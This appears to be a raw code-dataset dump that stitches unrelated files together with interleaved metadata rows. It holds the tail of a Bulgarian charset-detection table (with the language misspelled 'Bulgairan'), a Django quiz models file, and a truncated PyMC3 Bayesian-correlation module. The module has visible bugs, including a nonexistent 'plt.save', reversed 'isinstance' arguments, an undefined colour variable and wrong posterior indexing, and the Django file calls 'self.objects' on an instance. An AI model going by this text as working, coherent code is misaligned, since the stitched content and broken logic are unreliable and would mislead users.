1,2,2,1,2,1,2,2,1,1,0,1,2,1,2,2,1,1,1,0,0,1,1,1,2,1,0,1,0,0,0,0,
2,1,0,1,0,3,1,2,2,2,2,1,2,2,1,1,1,0,2,1,2,2,1,1,2,1,1,0,2,1,1,1,
1,2,2,2,2,2,2,2,1,2,0,1,1,0,2,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0,
2,1,1,1,1,2,2,2,2,1,2,2,2,1,2,2,1,1,2,1,2,3,2,2,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,3,2,0,1,2,0,1,2,1,1,0,1,0,1,2,1,2,0,0,0,1,1,0,0,0,1,0,0,2,
1,1,0,0,1,1,0,1,1,1,1,0,2,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,
2,0,0,0,0,1,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,2,1,1,1,
1,2,2,2,2,1,1,2,1,2,1,1,1,0,2,1,2,1,1,1,0,2,1,1,1,1,0,1,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,
1,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,3,2,0,0,0,0,1,0,0,0,0,0,0,1,1,0,2,0,0,0,0,0,0,0,0,1,0,1,2,
1,1,1,1,1,1,0,0,2,2,2,2,2,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,1,
2,3,1,2,1,0,1,1,0,2,2,2,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,2,
1,1,1,1,2,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,
2,2,2,2,2,0,0,2,0,0,2,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,0,2,2,
1,1,1,1,1,0,0,1,2,1,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,2,0,1,1,0,0,0,1,0,0,2,0,2,0,0,0,0,0,0,0,0,0,0,1,1,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,3,2,0,0,1,0,0,1,0,0,0,0,0,0,1,0,2,0,0,0,1,0,0,0,0,0,0,0,2,
1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,1,2,2,2,1,2,1,2,2,1,1,2,1,1,1,0,1,1,1,1,2,0,1,0,1,1,1,1,0,1,1,
1,1,2,1,1,1,1,1,1,0,0,1,2,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,
1,0,0,1,3,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,1,0,0,1,0,2,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,0,2,0,0,1,
0,2,0,1,0,0,1,1,2,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,1,1,0,2,1,0,1,1,1,0,0,1,0,2,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,2,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,
0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,1,2,1,1,1,1,1,1,2,2,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0,
1,1,2,1,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,1,2,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,
1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,2,0,0,2,0,1,0,0,1,0,0,1,
1,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,
1,1,1,1,1,1,1,2,0,0,0,0,0,0,2,1,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
)
Latin5BulgarianModel = {
'char_to_order_map': Latin5_BulgarianCharToOrderMap,
'precedence_matrix': BulgarianLangModel,
'typical_positive_ratio': 0.969392,
'keep_english_letter': False,
'charset_name': "ISO-8859-5",
'language': 'Bulgairan',
}
Win1251BulgarianModel = {
'char_to_order_map': win1251BulgarianCharToOrderMap,
'precedence_matrix': BulgarianLangModel,
'typical_positive_ratio': 0.969392,
'keep_english_letter': False,
'charset_name': "windows-1251",
'language': 'Bulgarian',
}
| 55.640351 | 70 | 0.550607 | 4,905 | 12,686 | 1.41998 | 0.071356 | 0.476382 | 0.596123 | 0.693754 | 0.777172 | 0.762958 | 0.742426 | 0.709978 | 0.669634 | 0.624264 | 0 | 0.469257 | 0.062825 | 12,686 | 227 | 71 | 55.885463 | 0.116578 | 0.110358 | 0 | 0.258242 | 0 | 0 | 0.020685 | 0.003957 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ace322f083367b4037c377c96ba682918d3d26ac | 3,573 | py | Python | app_quis/models.py | naelallves/proj_sinal_transito | bc8b82c1809b8ff97996227bbefc07f42ea5f736 | [
"MIT"
] | null | null | null | app_quis/models.py | naelallves/proj_sinal_transito | bc8b82c1809b8ff97996227bbefc07f42ea5f736 | [
"MIT"
] | null | null | null | app_quis/models.py | naelallves/proj_sinal_transito | bc8b82c1809b8ff97996227bbefc07f42ea5f736 | [
"MIT"
] | null | null | null | from itertools import chain
from django.db import models
class Categoria(models.Model):
nome = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)
updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)
class Meta:
verbose_name_plural = 'Categorias'
def to_dict(instance):
opts = instance._meta
data = {}
for f in chain(opts.concrete_fields, opts.private_fields):
data[f.name] = f.value_from_object(instance)
for f in opts.many_to_many:
data[f.name] = [i.id for i in f.value_from_object(instance)]
return data
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return self.__repr__()
class Pergunta(models.Model):
id_categoria = models.ForeignKey(Categoria, on_delete=models.CASCADE, blank=True, null=True)
código = models.CharField(max_length=50, blank=True, null=True)
enunciado = models.TextField(blank=True, null=False)
created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)
updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)
def getAlternativas(self):
relAlternativas = self.objects.get(id=self.id).relperguntaalternativa
alternativas = relAlternativas.alternativas
return alternativas
def to_dict(instance):
opts = instance._meta
data = {}
for f in chain(opts.concrete_fields, opts.private_fields):
data[f.name] = f.value_from_object(instance)
for f in opts.many_to_many:
data[f.name] = [i.id for i in f.value_from_object(instance)]
return data
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return self.__repr__()
class Meta:
verbose_name_plural = 'Perguntas'
class Alternativa(models.Model):
conteudo = models.TextField(blank=True, null=False)
created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)
updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)
class Meta:
verbose_name_plural = 'Alternativas'
def to_dict(instance):
opts = instance._meta
data = {}
for f in chain(opts.concrete_fields, opts.private_fields):
data[f.name] = f.value_from_object(instance)
for f in opts.many_to_many:
data[f.name] = [i.id for i in f.value_from_object(instance)]
return data
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return self.__repr__()
class RelPerguntaAlternativa(models.Model):
id_pergunta = models.ForeignKey(Pergunta, on_delete=models.CASCADE)
id_alternativa = models.ForeignKey(Alternativa, on_delete=models.CASCADE)
certa = models.BooleanField(default=False)
def to_dict(instance):
opts = instance._meta
data = {}
for f in chain(opts.concrete_fields, opts.private_fields):
data[f.name] = f.value_from_object(instance)
for f in opts.many_to_many:
data[f.name] = [i.id for i in f.value_from_object(instance)]
return data
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return self.__repr__()
# class RelAlternativaCategoria(models.Model):
# id_alternativa = models.ForeignKey(Alternativa, on_delete=models.CASCADE)
# id_categoria = models.ForeignKey(Categoria, on_delete=models.CASCADE)
# certa = models.BooleanField(default=False) | 40.146067 | 96 | 0.679261 | 469 | 3,573 | 4.908316 | 0.157783 | 0.034752 | 0.041703 | 0.055604 | 0.79192 | 0.773675 | 0.773675 | 0.773675 | 0.773675 | 0.640747 | 0 | 0.001788 | 0.217464 | 3,573 | 89 | 97 | 40.146067 | 0.821531 | 0.06829 | 0 | 0.730769 | 0 | 0 | 0.009323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.025641 | 0.102564 | 0.628205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
c587b49abf349b62155b61a1cbfe3f0c05c23363 | 29,562 | py | Python | pybaycor/pybaycor.py | pscicluna/pybaycor | dd76f46eb50af4812224d9f7e782942d0da6f5e0 | [
"MIT"
] | 8 | 2021-03-24T11:21:43.000Z | 2022-02-23T08:03:39.000Z | pybaycor/pybaycor.py | pscicluna/pybaycor | dd76f46eb50af4812224d9f7e782942d0da6f5e0 | [
"MIT"
] | 6 | 2021-03-20T04:20:50.000Z | 2021-03-24T07:57:58.000Z | pybaycor/pybaycor.py | pscicluna/pybaycor | dd76f46eb50af4812224d9f7e782942d0da6f5e0 | [
"MIT"
] | null | null | null | import numpy as np
import pymc3 as pm
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
import matplotlib.gridspec as gs
import arviz as az
import xarray as xr
class BayesianCorrelation():
""" A class to infer Bayesian correlation coefficients for multidimensional data without uncertainties
Parameters
----------
data : float, (n_points, n_dim) array_like
The multidimensional dataset to infer correlations on.
Either data OR both x & y should be passed as input.
x : float, (n_points) array_like
Array_like of x values (optional; only for 2-D datasets)
y : float, (n_points array_like
Array_like of y values (optional; only for 2-D datasets)
ndim : int, optional
The number of dimensions in the input data.
If not given, it will be inferred from the data
mu_prior : length-2 or (2, ndim) iterable of floats, optional, default (0., 1000.)
The mean and standard deviation of the Gaussian prior on the multivariate Normal distribution
sigma_prior : scalar or (ndim) iterable of floats, optional, default 200.
The prior on the scale parameter (beta) of the half-Cauchy prior on the standard deviations of the multivariate Normal distribution
Attributes
----------
None
Methods
--------
fit : Fit the data assuming they are drawn from a multivariate Normal distribution
summarise : summarise the results of the fit
plot_trace : plot the trace and marginal distributions of the trace
plot_data : plot the data overlaid with the ellipse described by the inferred correlated multivariate Normal
plot_corner : plot the 1D and 2D marginal distributions of the inferred parameters.
Examples
--------
Creating an instance is as simple as
>>> import pybaycor as pbc
>>> bc = pbc.BayesianCorrelation(data=data)
Once you have created the instances, the fit is run with
>>> bc.fit()
or you can modify the length of burn-in and number of steps with
>>> bc.fit(steps=2000, tune=2000)
Once you are happy with the fit, you can get a tabular summary with
>>> summary = bc.summarise()
and visual summaries with
>>> bc.plot_trace()
>>> bc.plot_corner()
>>> bc,plot_data()
"""
def __init__(self,data=None, x=None, y=None, ndim = None, mu_prior=[0.0,1000.], sigma_prior=200.):
#if ndim is None:
self.fitted=False
self.plot_trace_vars = ['mu', "chol_corr"]
if data is None:
if x is None and y is None:
raise ValueError("Either data must be given as input, or x and y")
else:
self.ndim = 2
self.data = np.column_stack((x,y))
else:
if ndim is None:
self.ndim = data.shape[1]
else:
self.ndim = ndim
if self.ndim != data.shape[1]:
raise ValueError("Data must have the same number of features and ndim")
self.data = data
self.model = pm.Model()
with self.model:
#we put weakly informative priors on the means and standard deviations of the multivariate normal distribution
mu = pm.Normal("mu", mu=mu_prior[0], sigma=mu_prior[1], shape=self.ndim)
sigma = pm.HalfCauchy.dist(sigma_prior)
#and a prior on the covariance matrix which weakly penalises strong correlations
chol, corr, stds = pm.LKJCholeskyCov("chol", n=self.ndim, eta=2.0, sd_dist=sigma, compute_corr=True)
#the prior gives us the Cholesky Decomposition of the covariance matrix, so for completeness we can calculate that determinisitically
cov = pm.Deterministic("cov", chol.dot(chol.T))
#and now we can put our observed values into a multivariate normal to complete the model
vals = pm.MvNormal('vals', mu=mu, chol=chol, observed=self.data)
pass
def fit(self,steps=1000, tune=1000, summarise=False):
""" Fit the model to infer the correlation coefficient
Parameters
----------
steps : int, optional, default 1000
Number of MCMC steps per chain after burn-in
tune : int, optional, default 1000
Number of steps per chain for burn-in
summarise : bool, default False
Whether to produce the table summary (also available through summarise())
"""
with self.model:
self.trace = pm.sample(
steps, tune=tune, target_accept=0.9, compute_convergence_checks=False,return_inferencedata=True
)
self.fitted=True
if summarise:
self.summary = az.summary(self.trace, var_names=["~chol"], round_to=2)
#self.rho = [self.summary['hdi_3%'][chol_corr[1,0]],self.summary['mean'][chol_corr[1,0]],self.summary['hdi_97%'][chol_corr[1,0]]]
print(self.summary)
return self.trace, self.summary
return self.trace
def summarise(self):
""" Summarise the results of the model
Parameters
----------
None
"""
self.summary = az.summary(self.trace, var_names=["~chol"], round_to=2)
print(self.summary)
return self.summary
def plot_trace(self,plotfile=None, show=False):
""" Plot the trace of the MCMC run along with the marginal distributions of a subset of parameters
Parameters
----------
plotfile : str, optional
Name of a file to write the plot to
show : bool, optional, default False
Whether to show the plot window
"""
if not self.fitted:
pass #raise an error here
ax = az.plot_trace(
self.trace,
var_names=self.plot_trace_vars,
#filter_vars="regex",
compact=True,
#lines=[
#("mu", {}, mu),
#("cov", {}, cov),
#("chol_stds", {}, sigma),
#("chol_corr", {}, rho),
#],
)
if isinstance(plotfile, str):
plt.save(plotfile)
if show:
plt.show()
#elif plotfile is not None:
# plt.close()
#should this also return the ax?
def plot_data(self,plotfile=None, show=None):
""" Plot the input data overlaid with the ellipse described by the inferred correlated multivariate distribution
Parameters
----------
plotfile : str, optional
Name of a file to write the plot to
show : bool, optional, default False
Whether to show the plot window
"""
#Currently only supports 2D correlations
#if self.ndim != 2:
# raise NotImplementedError("This routine doesn't support plotting correlations in more than 2 dimensions yet!")
if not self.fitted:
raise RuntimeError("Please run fit() before attempting to plot the results")
if self.ndim==np.int(2) and isinstance(self.ndim, int):
blue, _, red, *_ = sns.color_palette()
f, ax = plt.subplots(1, 1, figsize=(5, 4))#, gridspec_kw=dict(width_ratios=[4, 3]))
sns.scatterplot(x=self.data[:,0], y=self.data[:,1])
mu_post = self.trace.posterior["mu"].mean(axis=(0, 1)).data
sigma_post = self.trace.posterior["cov"].mean(axis=(0, 1)).data
var_post, U_post = np.linalg.eig(sigma_post)
angle_post = 180.0 / np.pi * np.arccos(np.abs(U_post[0, 0]))
e_post = Ellipse(
mu_post,
2 * np.sqrt(5.991 * var_post[0]),
2 * np.sqrt(5.991 * var_post[1]),
angle=angle_post,
)
e_post.set_alpha(0.5)
e_post.set_facecolor(blue)
e_post.set_zorder(10)
ax.add_artist(e_post)
rect_post = plt.Rectangle((0, 0), 1, 1, fc=blue, alpha=0.5)
ax.legend(
[rect_post],
["Estimated 95% density region"],
loc=2,
)
#plt.show()
elif self.ndim > 2 and isinstance(int, self.ndim) and np.isfinite(self.ndim):
#raise NotImplementedError("This routine doesn't support plotting correlations in more than 2 dimensions yet!")
rows = self.ndim - 1
cols = self.ndim - 1
fig = plt.figure()
gs = fig.add_gridSpec(rows, cols,left=0.1, right=0.9, bottom=0.1, top=0.9,
wspace=0.05, hspace=0.05)
for i in range(self.ndim - 1):
for j in range(i+1,self.ndim - 1):
ax = fig.add_subplot(gs[i,j])
#plot the data points
sns.scatterplot(self.data[:,i], self.data[:,j], ax=ax)
mu_post = self.trace.posterior["mu"].mean(axis=(i, j)).data
sigma_post = self.trace.posterior["cov"].mean(axis=(i, j)).data
var_post, U_post = np.linalg.eig(sigma_post)
angle_post = 180.0 / np.pi * np.arccos(np.abs(U_post[0, 0]))
e_post = Ellipse(
mu_post,
2 * np.sqrt(5.991 * var_post[0]),
2 * np.sqrt(5.991 * var_post[1]),
angle=angle_post,
)
e_post.set_alpha(0.5)
e_post.set_facecolor(blue)
e_post.set_zorder(10)
ax.add_artist(e_post)
else:
raise ValueError("Ndim is either less than 2 or is not an integer!")
if isinstance(plotfile, str):
plt.save(plotfile)
elif not show:
raise TypeError("plotfile must be a string")
if show:
plt.show()
#elif plotfile is not None:
# plt.close()
def plot_corner(self, point_estimate='mean',plotfile=None,show=True):
""" Plot the 1D and 2D marginal distributions of the inferred parameters
Parameters
----------
plotfile : str, optional
Name of a file to write the plot to
show : bool, optional, default False
Whether to show the plot window
"""
#For consistency's sake I'm going to re-invent the wheel here, and manually create a grid of plots from arviz, rather than letting corner do the work. This is because I want to make sure specific entries are plotted in a specific order.
plot_vars = self.plot_trace_vars#[:-1]
chol_coords = []
if self.ndim == 2:
#chol_coords.append(0)
#chol_coords.append(1)
chol_coords=(0,1)
coords = {"chol_corr_dim_0":[0], "chol_corr_dim_1":[1]}
#plot_vars.append("chol_corr[0,1]")
else:
coords = {"chol_corr_dim_0":[], "chol_corr_dim_1":[]}
d0 = []
d1 = []
#raise NotImplementedError("Corner plots for data with more than 2 dimensions are not available yet!")
for i in range(self.ndim - 1):
for j in range(1,self.ndim - 1):
d0.append(i)
d1.append(j)
#print(i,j)
#chol_coords.append([i,j])#"chol_corr["+str(i)+","+str(j)+"]")
coords["chol_corr_dim_0"] = xr.DataArray(d0, dims=['pointwise_sel'])
coords["chol_corr_dim_1"] = xr.DataArray(d1, dims=['pointwise_sel'])
#print(plot_vars)
#coords = {"chol_corr":chol_coords}
#print(coords)
#corner = gs.GridSpec(rows, cols, figure=fig
az.plot_pair(self.trace,
var_names = plot_vars,
coords = coords,
kind="kde",
marginals=True,
point_estimate=point_estimate,
show=show,
)
if isinstance(plotfile, str) and not show:
plt.save(plotfile)
elif not show:
raise TypeError("plotfile must be a string")
#pass
class RobustBayesianCorrelation(BayesianCorrelation):
""" A class to infer robust Bayesian correlation coefficients for multidimensional data without uncertainties
Parameters
----------
data : float, (n_points, n_dim) array_like
The multidimensional dataset to infer correlations on.
Either data OR both x & y should be passed as input.
x : float, (n_points) array_like
Array_like of x values (optional; only for 2-D datasets)
y : float, (n_points array_like
Array_like of y values (optional; only for 2-D datasets)
ndim : int, optional
The number of dimensions in the input data.
If not given, it will be inferred from the data
mu_prior : length-2 or (2, ndim) iterable of floats, optional, default (0., 1000.)
The mean and standard deviation of the Gaussian prior on the multivariate t distribution
sigma_prior : scalar or (ndim) iterable of floats, optional, default 200.
The prior on the scale parameter (beta) of the half-Cauchy prior on the standard deviations of the multivariate t distribution
Attributes
----------
None
Methods
--------
fit : Fit the data assuming they are drawn from a multivariate Normal distribution
summarise : summarise the results of the fit
plot_trace : plot the trace and marginal distributions of the trace
plot_data : plot the data overlaid with the ellipse described by the inferred correlated multivariate Normal
plot_corner : plot the 1D and 2D marginal distributions of the inferred parameters.
Examples
--------
Creating an instance is as simple as
>>> import pybaycor as pbc
>>> bc = pbc.BayesianCorrelation(data=data)
Once you have created the instances, the fit is run with
>>> bc.fit()
or you can modify the length of burn-in and number of steps with
>>> bc.fit(steps=2000, tune=2000)
Once you are happy with the fit, you can get a tabular summary with
>>> summary = bc.summarise()
and visual summaries with
>>> bc.plot_trace()
>>> bc.plot_corner()
>>> bc,plot_data()
"""
def __init__(self,data=None, x=None, y=None, ndim = None, mu_prior=[0.0,1000.], sigma_prior=200.):
#if ndim is None:
self.fitted=False
self.plot_trace_vars = ['mu', "nu", "chol_corr"] #, "~nu-1", "~cov", "~chol_stds", "~chol"]
if data is None:
if x is None and y is None:
raise ValueError("Either data must be given as input, or x and y")
else:
self.ndim = 2
self.data = np.column_stack((x,y))
else:
if ndim is None:
self.ndim = data.shape[1]
else:
self.ndim = ndim
if self.ndim != data.shape[1]:
raise ValueError("Data must have the same number of features and ndim")
self.data = data
self.model = pm.Model()
with self.model:
#we put weakly informative priors on the means and standard deviations of the multivariate normal distribution
mu = pm.Normal("mu", mu=mu_prior[0], sigma=mu_prior[1], shape=self.ndim)
sigma = pm.HalfCauchy.dist(sigma_prior)
#and a prior on the covariance matrix which weakly penalises strong correlations
chol, corr, stds = pm.LKJCholeskyCov("chol", n=self.ndim, eta=2.0, sd_dist=sigma, compute_corr=True)
#the prior gives us the Cholesky Decomposition of the covariance matrix, so for completeness we can calculate that determinisitically
cov = pm.Deterministic("cov", chol.dot(chol.T))
nuMinusOne = pm.Exponential('nu-1', lam=1./29.)
nu = pm.Deterministic('nu', nuMinusOne + 1)
#and now we can put our observed values into a multivariate t distribution to complete the model
vals = pm.MvStudentT('vals', nu = nu, mu=mu, chol=chol, observed=self.data)
class HierarchicalBayesianCorrelation(BayesianCorrelation):
"""A class to infer Bayesian correlation coefficients for uncertain multidimensional data
Parameters
----------
data : float, (n_points, n_dim) array_like
The multidimensional dataset to infer correlations on.
sigma : float, (n_points, n_dim) array_like
The uncertainties of the multidimensional dataset to infer correlations on.
mu_prior : length-2 or (2, ndim) iterable of floats, optional, default (0., 1000.)
The mean and standard deviation of the Gaussian prior on the multivariate Normal distribution
sigma_prior : scalar or (ndim) iterable of floats, optional, default 200.
The prior on the scale parameter (beta) of the half-Cauchy prior on the standard deviations of the multivariate Normal distribution
Attributes
----------
None
Methods
--------
fit : Fit the data assuming they are drawn from a multivariate Normal distribution
summarise : summarise the results of the fit
plot_trace : plot the trace and marginal distributions of the trace
plot_data : plot the data overlaid with the ellipse described by the inferred correlated multivariate Normal
plot_corner : plot the 1D and 2D marginal distributions of the inferred parameters.
Examples
--------
Creating an instance is as simple as
>>> import pybaycor as pbc
>>> bc = pbc.BayesianCorrelation(data=data)
Once you have created the instances, the fit is run with
>>> bc.fit()
or you can modify the length of burn-in and number of steps with
>>> bc.fit(steps=2000, tune=2000)
Once you are happy with the fit, you can get a tabular summary with
>>> summary = bc.summarise()
and visual summaries with
>>> bc.plot_trace()
>>> bc.plot_corner()
>>> bc,plot_data()
"""
def __init__(self, data, sigma, mu_prior=[0.0,1000.], sigma_prior=200.):
self.fitted=False
if np.any(sigma <=0.):
raise ValueError("Uncertainties must be positive real numbers!")
self.plot_trace_vars = ['mu', "chol_corr"]
if data is None:
raise ValueError("Either data must be given as input, or x and y")
else:
self.ndim = data.shape[1]
self.npoints = data.shape[0]
self.data = data
if data.shape != sigma.shape:
raise RuntimeError("data and sigma must have the same shape!")
self.sigma = sigma
self.model = pm.Model()
with self.model:
#we put weakly informative hyperpriors on the means and standard deviations of the multivariate normal distribution
mu = pm.Normal("mu", mu=mu_prior[0], sigma=mu_prior[1], shape=self.ndim)
sigma = pm.HalfCauchy.dist(sigma_prior)
#and a hyperprior on the covariance matrix which weakly penalises strong correlations
chol, corr, stds = pm.LKJCholeskyCov("chol", n=self.ndim, eta=2.0, sd_dist=sigma, compute_corr=True)
#the hyperprior gives us the Cholesky Decomposition of the covariance matrix, so for completeness we can calculate that determinisitically
cov = pm.Deterministic("cov", chol.dot(chol.T))
#and now we can construct our multivariate normals to complete the prior
prior = pm.MvNormal('vals', mu=mu, chol=chol, shape=(self.npoints,self.ndim)) #, observed=self.data)
#print(prior)
#help(prior)
mu1s = prior[:,0]
datavars = []
datavars = pm.Normal("data", mu = prior, sigma = self.sigma, observed = self.data)
#Finally, we need to define our data
#for i in range(self.ndim):
# datavars.append(pm.Normal("data_"+str(i), mu=prior[:,i], sigma = self.sigma[:,i], observed=self.data[:,i]))
print(datavars)
def data_summary(self, printout=True):
"""
"""
#if self.summary is None:
self.summary_data = az.summary(self.trace, var_names=["vals"], filter_vars="like", round_to=2)
if printout:
print(self.summary_data)
return self.summary_data
def model_summary(self):
"""
"""
if self.summary is None:
self.summary = az.summary(self.trace, var_names=["~chol","~vals"], round_to=2)
pass
def plot_data(self, plot_input=True, plot_fitted=True,plotfile=None, show=None):
"""Plot the input data overlaid with the ellipse described by the inferred correlated multivariate distribution
Parameters
----------
plot_input : bool, default True
Whether to plot the input data and their uncertainties
plot_fitted : bool, default True
Whether to plot the inferred data and their inferred uncertainties
plotfile : str, optional
Name of a file to write the plot to
show : bool, optional, default False
Whether to show the plot window
"""
if not self.fitted:
raise RuntimeError("Please run fit() before attempting to plot the results")
fitted_data = self.data_summary(printout=False)
fitted_mean = fitted_data['mean'].to_numpy().reshape((self.npoints,self.ndim))
print(fitted_mean.shape)
fitted_sigma = fitted_data['sd'].to_numpy().reshape((self.npoints,self.ndim))
if self.ndim==np.int(2) and isinstance(self.ndim, int):
blue, _, red, *_ = sns.color_palette()
f, ax = plt.subplots(1, 1, figsize=(5, 4))#, gridspec_kw=dict(width_ratios=[4, 3]))
sns.scatterplot(x=self.data[:,0], y=self.data[:,1])
if plot_input:
ax.errorbar(x=self.data[:,0], y=self.data[:,1],
xerr=self.sigma[:,0], yerr=self.sigma[:,1],fmt='o',label='input data')
if plot_fitted:
ax.errorbar(x=fitted_mean[:,0], y=fitted_mean[:,1],
xerr=fitted_sigma[:,0], yerr=fitted_sigma[:,1],fmt='o',label='inferred data')
mu_post = self.trace.posterior["mu"].mean(axis=(0, 1)).data
sigma_post = self.trace.posterior["cov"].mean(axis=(0, 1)).data
var_post, U_post = np.linalg.eig(sigma_post)
angle_post = 180.0 / np.pi * np.arccos(np.abs(U_post[0, 0]))
e_post = Ellipse(
mu_post,
2 * np.sqrt(5.991 * var_post[0]),
2 * np.sqrt(5.991 * var_post[1]),
angle=angle_post,
)
e_post.set_alpha(0.5)
e_post.set_facecolor(blue)
e_post.set_zorder(10)
ax.add_artist(e_post)
rect_post = plt.Rectangle((0, 0), 1, 1, fc=blue, alpha=0.5)
ax.legend(
[rect_post],
["Estimated 95% density region"],
loc=2,
)
#plt.show()
elif self.ndim > 2 and isinstance(int, self.ndim) and np.isfinite(self.ndim):
#raise NotImplementedError("This routine doesn't support plotting correlations in more than 2 dimensions yet!")
rows = self.ndim - 1
cols = self.ndim - 1
fig = plt.figure()
gs = fig.add_gridSpec(rows, cols,left=0.1, right=0.9, bottom=0.1, top=0.9,
wspace=0.05, hspace=0.05)
for i in range(self.ndim - 1):
for j in range(i+1,self.ndim - 1):
ax = fig.add_subplot(gs[i,j])
#plot the data points
sns.scatterplot(self.data[:,i], self.data[:,j], ax=ax)
if plot_input:
ax.errorbar(x=self.data[:,i], y=self.data[:,j],
xerr=self.sigma[:,i], yerr=self.sigma[:,j])
if plot_fitted:
ax.errorbar(x=fitted_mean[:,i], y=fitted_mean[:,j],
xerr=fitted_sigma[:,i], yerr=fitted_sigma[:,j])
mu_post = self.trace.posterior["mu"].mean(axis=(i, j)).data
sigma_post = self.trace.posterior["cov"].mean(axis=(i, j)).data
var_post, U_post = np.linalg.eig(sigma_post)
angle_post = 180.0 / np.pi * np.arccos(np.abs(U_post[0, 0]))
e_post = Ellipse(
mu_post,
2 * np.sqrt(5.991 * var_post[0]),
2 * np.sqrt(5.991 * var_post[1]),
angle=angle_post,
)
e_post.set_alpha(0.5)
e_post.set_facecolor(blue)
e_post.set_zorder(10)
ax.add_artist(e_post)
else:
raise ValueError("Ndim is either less than 2 or is not an integer!")
if isinstance(plotfile, str):
plt.save(plotfile)
elif not show:
raise TypeError("plotfile must be a string")
if show:
plt.show()
elif plotfile is not None:
plt.close()
class HierarchicalRobustBayesianCorrelation(HierarchicalBayesianCorrelation):
"""A class to infer robust Bayesian correlation coefficients for uncertain multidimensional data
Parameters
----------
